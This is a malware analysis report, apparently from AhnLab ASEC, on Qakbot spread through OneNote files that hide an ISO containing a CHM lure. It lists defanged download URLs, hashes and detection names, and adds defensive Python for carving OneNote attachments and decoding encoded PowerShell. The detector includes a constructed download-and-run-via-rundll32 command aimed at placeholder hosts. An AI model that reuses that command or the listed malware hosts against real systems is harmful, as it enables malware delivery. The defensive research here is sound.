Qakbot Distributed via OneNote and CHM

AhnLab Security Emergency response Center (ASEC) has covered various distribution methods of Qakbot, and distribution through OneNote was covered back in February. The distribution of Qakbot through OneNote has been confirmed again recently, and in this recent attack a Windows Help file (CHM) was used as the second stage.

Previous coverage: https://asec.ahnlab.com/en/47785/

Upon executing the OneNote file, the user is prompted to click an Open button placed next to a Microsoft Azure image, as shown below. An ISO file is hidden underneath this button; once the user clicks Open, the ISO file is written to a temp folder and mounted.

A CHM disguised as a README file exists inside the ISO, prompting users to open it. 
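The OneNote-with-hidden-ISO stage described above can be triaged without opening the file: OneNote stores an attachment as a FileDataStoreObject ([MS-ONESTORE] 2.6.13), a header GUID, an 8-byte length, 12 bytes of padding, the raw file bytes and a footer GUID. The script below is an added example (not ASEC's code and not from the analysed sample) that carves every such object from a .one blob and labels it by magic bytes, checking the ISO 9660 volume descriptor at offset 0x8001 for the ISO case. The sample input is constructed inline; only the FileDataStoreObject layout is taken from the specification.

```python
import struct

# FileDataStoreObject markers from [MS-ONESTORE] 2.6.13, as the little-endian
# byte form of the GUIDs {BDE316E7-2665-4511-A4C4-8D4D0B7A9EAC} (header) and
# {71FBA722-0F79-4A0B-BB13-899256426B24} (footer).
FDSO_HEADER = bytes.fromhex("e716e3bd65251145a4c48d4d0b7a9eac")
FDSO_FOOTER = bytes.fromhex("227bfb71790f0b4abb13899256426b24")
FDSO_HEADER_SIZE = 36  # guidHeader(16) + cbLength(8) + unused(4) + reserved(8)


def carve_embedded_files(one_bytes: bytes) -> list:
    """Return (offset, payload) for every embedded file found in a .one blob."""
    found = []
    pos = one_bytes.find(FDSO_HEADER)
    while pos != -1:
        (cb_length,) = struct.unpack_from("<Q", one_bytes, pos + 16)
        start = pos + FDSO_HEADER_SIZE
        end = start + cb_length
        # The footer GUID must directly follow the payload; if it does not, the
        # length field is corrupt (or this was a false hit) and we skip it.
        if end + 16 <= len(one_bytes) and one_bytes[end:end + 16] == FDSO_FOOTER:
            found.append((pos, one_bytes[start:end]))
            pos = one_bytes.find(FDSO_HEADER, end + 16)
        else:
            pos = one_bytes.find(FDSO_HEADER, pos + 1)
    return found


def classify_payload(payload: bytes) -> str:
    """Coarse type identification by magic bytes. ISO 9660 images carry a
    primary volume descriptor at 0x8000 whose identifier 'CD001' sits at 0x8001."""
    if len(payload) > 0x8006 and payload[0x8001:0x8006] == b"CD001":
        return "iso"
    if payload[:4] == b"ITSF":          # compiled HTML help (CHM)
        return "chm"
    if payload[:2] == b"MZ":            # PE executable / DLL
        return "pe"
    if payload[:4] == b"%PDF":
        return "pdf"
    return "unknown"


def suspicious_embeds(one_bytes: bytes) -> list:
    """Offsets and types of every embedded object, for a quick triage listing."""
    return [(off, classify_payload(p)) for off, p in carve_embedded_files(one_bytes)]


def build_sample_one() -> bytes:
    """Constructed sample: a .one-like blob carrying one embedded ISO image.
    It is not a real OneNote file; only the FileDataStoreObject layout is accurate."""
    iso = bytearray(0x9000)
    iso[0x8000:0x8006] = b"\x01CD001"  # descriptor type 1 + standard identifier
    fdso = FDSO_HEADER + struct.pack("<QIQ", len(iso), 0, 0) + bytes(iso) + FDSO_FOOTER
    return b"\x00" * 64 + fdso + b"\x00" * 64


if __name__ == "__main__":
    for offset, kind in suspicious_embeds(build_sample_one()):
        print(f"embedded object at 0x{offset:x}: {kind}")
```

Run it against a real .one file by reading the file into `one_bytes`; an attachment that classifies as `iso`, `chm` or `pe` in a document that was supposed to contain notes is the signal worth escalating. The footer check matters in practice, because the header GUID can also appear inside other embedded data.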

Upon executing the CHM file, a normal help screen regarding network connectivity is displayed, making it difficult for the user to notice the malicious behavior. 

The malicious script, which runs without the user's knowledge, is shown below. It launches an encoded PowerShell command through CMD. The command is triggered via the Click method, the same technique used by existing CHM malware.

The decoded PowerShell command is shown below. It attempts to download additional malicious files from multiple URLs and saves them to the %TEMP%\antepredicamentPersecutory.tuners path. Since the downloaded file is then executed through rundll32, it can be assumed that the downloaded files are DLLs.

Download URLs:
  • hxxps://nayadofoundation[.]org/wXaKm/SQ2wfto2vosn
  • hxxps://citytech-solutions[.]com/6Mh1k/OJMPf
  • hxxps://zainco[.]net/OdOU/9IAsdunbnH
  • hxxps://gsscorporationltd[.]com/okSfj/rAVykcQiX
  • hxxps://mrcrizquna[.]com/L7ccN/kz5AeBZ6
  • hxxps://hotellosmirtos[.]com/sjn/uhidwrQ9Hz
  • hxxps://carladvogadatributaria[.]com/tvnq9/i8zBwKW
  • hxxps://erg-eg[.]com/ocmb/xvjmmvS
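The encoded PowerShell stage above is what a process-creation log (Sysmon event 1, Windows event 4688) would actually show, so a useful detection is to decode `-EncodedCommand` arguments on the fly and look for the combination the post describes: several download URLs, a %TEMP% drop path and execution through rundll32. The script below is an added example (not ASEC's code and not the sample's own command) that does that decoding and scoring. The command line it analyses is constructed for the example with placeholder `.invalid` domains and a hypothetical file name; the only fact it relies on is that PowerShell expects the encoded command as base64 over UTF-16LE text.

```python
import base64
import re

# Detection features drawn from the behaviour described above.
URL_RE = re.compile(r"https?://[^\s'\"`;,)]+", re.IGNORECASE)
# Common spellings of the switch (-e, -ec, -enc, -EncodedCommand), followed by base64.
ENC_FLAG_RE = re.compile(r"-(?:encodedcommand|enc|ec|e)\s+([A-Za-z0-9+/=]+)", re.IGNORECASE)
TEMP_RE = re.compile(r"\$env:temp|%temp%", re.IGNORECASE)
RUNDLL_RE = re.compile(r"\brundll32(?:\.exe)?\b", re.IGNORECASE)


def decode_encoded_command(cmdline: str):
    """Return the plaintext of a PowerShell -EncodedCommand argument, or None.
    The argument is base64 of the script encoded as UTF-16LE, not UTF-8."""
    m = ENC_FLAG_RE.search(cmdline)
    if not m:
        return None
    try:
        raw = base64.b64decode(m.group(1), validate=True)
        return raw.decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return None


def analyse_cmdline(cmdline: str) -> dict:
    """Decode the command line and score it on the three described indicators."""
    script = decode_encoded_command(cmdline)
    if script is None:
        return {"encoded": False, "urls": [], "temp_path": False, "rundll32": False, "score": 0}
    urls = URL_RE.findall(script)
    temp_path = bool(TEMP_RE.search(script))
    rundll = bool(RUNDLL_RE.search(script))
    # Two or more fallback URLs weigh more than a single download.
    score = (2 if len(urls) >= 2 else 1 if urls else 0) + int(temp_path) + int(rundll)
    return {"encoded": True, "urls": urls, "temp_path": temp_path, "rundll32": rundll, "score": score}


def build_sample_cmdline() -> str:
    """Constructed sample mirroring the described behaviour (multiple download
    URLs, a %TEMP% drop path, rundll32 execution). Placeholder '.invalid' domains
    and a hypothetical file name; this is not the real campaign command."""
    script = ("$u='https://first.invalid/a','https://second.invalid/b';"
              "$p=\"$env:TEMP\\sample.tuners\";"
              "foreach($x in $u){try{iwr $x -OutFile $p;break}catch{}};"
              "rundll32 $p,Entry")
    enc = base64.b64encode(script.encode("utf-16-le")).decode("ascii")
    return f"cmd.exe /c powershell.exe -w hidden -enc {enc}"


if __name__ == "__main__":
    result = analyse_cmdline(build_sample_cmdline())
    print(f"score={result['score']} urls={len(result['urls'])} "
          f"temp={result['temp_path']} rundll32={result['rundll32']}")
```

In a SIEM rule the parent chain adds precision: here the chain is hh.exe (the CHM viewer) spawning cmd.exe spawning powershell.exe, and a later rundll32.exe loading a file from %TEMP%, which is a sequence a note-taking or help workflow never produces on its own.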

This command is similar to the one used by the Qakbot sample distributed via PDF back in April. The download URLs are currently unavailable, but internal and external infrastructure showed that the Qakbot binary was distributed from them while a connection could still be made.

Related analysis: https://asec.ahnlab.com/en/51282/

Recently, the number of malware distribution cases using OneNote has been increasing, and threat actors have been using various file formats in their attacks. Users must be careful when opening emails and OneNote files from unknown sources.

AhnLab's anti-malware product, V3, detects and blocks the malware using the aliases below.

[File Detection]
  • Dropper/MSOffice.Generic (2023.04.24.03)
  • Downloader/CHM.Generic (2023.04.24.03)

[IOC]

MD5
2ce926649092b4aa642ba6ed1fe0f191
dffd7026f7508ae69c1b23ebd33ed615

URL
https[:]//carladvogadatributaria[.]com/tvnq9/i8zBwKW
https[:]//citytech-solutions[.]com/6Mh1k/OJMPf
https[:]//erg-eg[.]com/ocmb/xvjmmvS
https[:]//gsscorporationltd[.]com/okSfj/rAVykcQiX
https[:]//hotellosmirtos[.]com/sjn/uhidwrQ9Hz
